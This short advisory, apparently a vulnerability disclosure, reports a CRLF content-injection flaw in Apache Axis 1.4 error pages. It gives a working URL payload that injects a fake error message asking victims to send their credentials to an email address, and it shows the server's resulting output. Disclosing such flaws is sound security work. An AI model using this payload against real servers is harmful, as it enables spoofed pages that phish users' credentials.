Version tested:- 1.4
vendor's website:- http://ws.apache.org/axis/
Details:- The vulnerability reported earlier this year, was later addressed by apache axis group and the error messages in version 1.4 do not leak the document root or any directory structure. However, the error message returned for an non-existing WSDL is vulnerable to CRLF injection and although, it html encodes all the user's input, thereby denying any XSS or html injection, content injection is still be possible(a minor issue).
Exploit:- victim/axis/tt_pm4l%0d%0a%0d%0a%0d%0a%0d
%0a---------------------%0d%0aAn%20Error%20has%20Occured
%0d%0a%0d%0aplease%20send%20your%20
credentials%20and%20problem%20encountered%20to%20%0d
%0ablah@blah.com%0d%0a--------------%0d%0a%0d%0a%0d
%0a.jws?wsdl
Output:-
AXIS error
Sorry, something seems to have gone wrong... here are the details:
Fault - ; nested exception is:
java.io.FileNotFoundException: /tt_pm4l
---------------------
An Error has Occured
please send your credentials and problem encountered to
--------------
.jws
AxisFault
...
..